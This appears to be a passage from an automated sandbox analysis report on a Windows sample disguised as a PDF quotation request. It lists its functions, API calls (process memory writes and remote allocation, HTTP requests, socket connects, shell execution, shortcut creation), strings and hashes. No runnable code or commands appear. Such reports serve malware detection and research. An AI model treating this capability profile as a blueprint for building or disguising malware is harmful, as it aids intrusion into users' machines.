• connect.WSOCK32(00000000,?,00000010), ref: 00465446
• WSAGetLastError.WSOCK32(00000000), ref: 0046546D
• closesocket.WSOCK32(00000000,00000000), ref: 00465481
Similarity
• API ID: ErrorLast$closesocketconnectinet_addrsocket
APIs
• DeleteObject.GDI32(00000000), ref: 004471D8
• ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
• SelectObject.GDI32(?,00000000), ref: 00447228
• BeginPath.GDI32(?), ref: 0044723D
• SelectObject.GDI32(?,00000000), ref: 00447266
Similarity
• API ID: Object$Select$BeginCreateDeletePath
APIs
• Sleep.KERNEL32(00000000), ref: 00434598
• QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
• Sleep.KERNEL32(00000000), ref: 004345D4
• QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
Similarity
• API ID: CounterPerformanceQuerySleep
APIs
• GetDlgItem.USER32(?,000003E9), ref: 00460C17
• GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
• MessageBeep.USER32(00000000), ref: 00460C46
• KillTimer.USER32(?,0000040A), ref: 00460C68
• EndDialog.USER32(?,00000001), ref: 00460C83
Similarity
• API ID: BeepDialogItemKillMessageTextTimerWindow
APIs
Similarity
• API ID: Destroy$DeleteObjectWindow$Icon
APIs
• SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
• DeleteObject.GDI32(?), ref: 00455736
• DeleteObject.GDI32(?), ref: 00455744
• DestroyIcon.USER32(?), ref: 00455752
• DestroyWindow.USER32(?), ref: 00455760
Similarity
• API ID: DeleteDestroyObject$IconMessageSendWindow
APIs
  • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
• DestroyWindow.USER32(?), ref: 00455728
• DeleteObject.GDI32(?), ref: 00455736
• DeleteObject.GDI32(?), ref: 00455744
• DestroyIcon.USER32(?), ref: 00455752
• DestroyWindow.USER32(?), ref: 00455760
Similarity
• API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
APIs
• __getptd.LIBCMT ref: 0041780F
  • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
  • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
• __getptd.LIBCMT ref: 00417826
• __amsg_exit.LIBCMT ref: 00417834
• __lock.LIBCMT ref: 00417844
• __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
Similarity
• API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                    APIs
                                                                      • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                                    • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                      • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                      • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                    • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                      • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                    • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                    • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                    • ExitThread.KERNEL32 ref: 004151ED
                                                                    • __freefls@4.LIBCMT ref: 00415209
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                    • String ID:
                                                                    • API String ID: 4247068974-0
                                                                    • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                                    • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                                                                    • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                                    • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: )$U$\
                                                                    • API String ID: 0-3705770531
                                                                    • Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                                    • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                                                                    • Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                                    • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                                                                    APIs
                                                                      • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                                    • CoInitialize.OLE32(00000000), ref: 0046E505
                                                                    • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                                                    • CoUninitialize.OLE32 ref: 0046E53D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                    • String ID: .lnk
                                                                    • API String ID: 886957087-24824748
                                                                    • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                                    • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                                                                    • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                                    • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove
                                                                    • String ID: \
                                                                    • API String ID: 4104443479-2967466578
                                                                    • Opcode ID: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                                    • Instruction ID: 90b25fc4546a2c21e21e7939c456fa175a28996bec6c3309f7edcf8d77039fcb
                                                                    • Opcode Fuzzy Hash: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                                    • Instruction Fuzzy Hash: 8AB1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove
                                                                    • String ID: \
                                                                    • API String ID: 4104443479-2967466578
                                                                    • Opcode ID: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                                    • Instruction ID: 47d8400a167da4587eb122393216330e55bf30386b581c043e0675457d4a745f
                                                                    • Opcode Fuzzy Hash: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                                    • Instruction Fuzzy Hash: F1B1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove
                                                                    • String ID: \
                                                                    • API String ID: 4104443479-2967466578
                                                                    • Opcode ID: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                                    • Instruction ID: 4d1558bed40bbae7f26d93592334ac0d2c658ca85fbb7fec499742c135aa7d63
                                                                    • Opcode Fuzzy Hash: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                                    • Instruction Fuzzy Hash: E5A1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED441AB381D7795946CB1A
                                                                    Strings
                                                                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                                                                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                    • API String ID: 708495834-557222456
                                                                    • Opcode ID: 3a13b15884de974d4fda4968be31590525042cec53bcb86b62071813a3441500
                                                                    • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                                                                    • Opcode Fuzzy Hash: 3a13b15884de974d4fda4968be31590525042cec53bcb86b62071813a3441500
                                                                    • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                                                                    APIs
                                                                      • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                                                      • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                                                      • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                                                      • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                                                      • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                                                                    • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                    • String ID: @
                                                                    • API String ID: 4150878124-2766056989
                                                                    • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                                    • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                                                                    • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                                    • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove
                                                                    • String ID: \$]$h
                                                                    • API String ID: 4104443479-3262404753
                                                                    • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                                    • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                                                                    • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                                    • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                                                                    APIs
                                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                                                                      • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                      • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                    • CloseHandle.KERNEL32(?), ref: 00457E09
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                                                                    • String ID: <$@
                                                                    • API String ID: 2417854910-1426351568
                                                                    • Opcode ID: 23a982fe15c137d7c48bd8774b96cc0308a15ae84031f3429ed6e3a66c4187d5
                                                                    • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                                                                    • Opcode Fuzzy Hash: 23a982fe15c137d7c48bd8774b96cc0308a15ae84031f3429ed6e3a66c4187d5
                                                                    • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
APIs
• InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
Strings
Memory Dump Source
• Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
• String ID:
• API String ID: 3705125965-3916222277
• Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
• Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
• Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
• Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
APIs
• GetMenuItemInfoW.USER32 ref: 0045FAC4
• DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
• DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
Strings
Memory Dump Source
• Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Menu$Delete$InfoItem
• String ID: 0
• API String ID: 135850232-4108050209
• Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
• Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
• Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
• Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
APIs
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
• GetWindowLongW.USER32(?,000000F0), ref: 0045087D
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
Strings
Memory Dump Source
• Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Window$Long
• String ID: SysTreeView32
• API String ID: 847901565-1698111956
• Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
• Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
• Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
• Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
APIs
• LoadLibraryA.KERNEL32(?), ref: 00434B10
• GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
• FreeLibrary.KERNEL32(?), ref: 00434B9F
Strings
Memory Dump Source
• Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: AU3_GetPluginDetails
• API String ID: 145871493-4132174516
• Opcode ID: 49aae325781426d2cb5559c12b94001afea8abe48dc6c22cb0194f3c30cec496
• Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
• Opcode Fuzzy Hash: 49aae325781426d2cb5559c12b94001afea8abe48dc6c22cb0194f3c30cec496
• Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
APIs
• DestroyWindow.USER32(00000000), ref: 00450A2F
Strings
Memory Dump Source
• Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: DestroyWindow
• String ID: msctls_updown32
• API String ID: 3375834691-2298589950
• Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
• Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
• Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
• Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: _memmove
• String ID: $<
• API String ID: 4104443479-428540627
• Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
• Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
• Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
• Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D79D
• GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
Strings
Memory Dump Source
• Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ErrorMode$DiskFreeSpace
• String ID: \VH
• API String ID: 1682464887-234962358
• Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
• Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
• Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
• Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D79D
• GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
Strings
Memory Dump Source
• Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ErrorMode$DiskFreeSpace
• String ID: \VH
• API String ID: 1682464887-234962358
• Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
• Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
• Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
• Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D87B
• GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
Strings
Memory Dump Source
• Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ErrorMode$DiskFreeSpace
• String ID: \VH
• API String ID: 1682464887-234962358
• Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
• Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
• Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
• Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
APIs
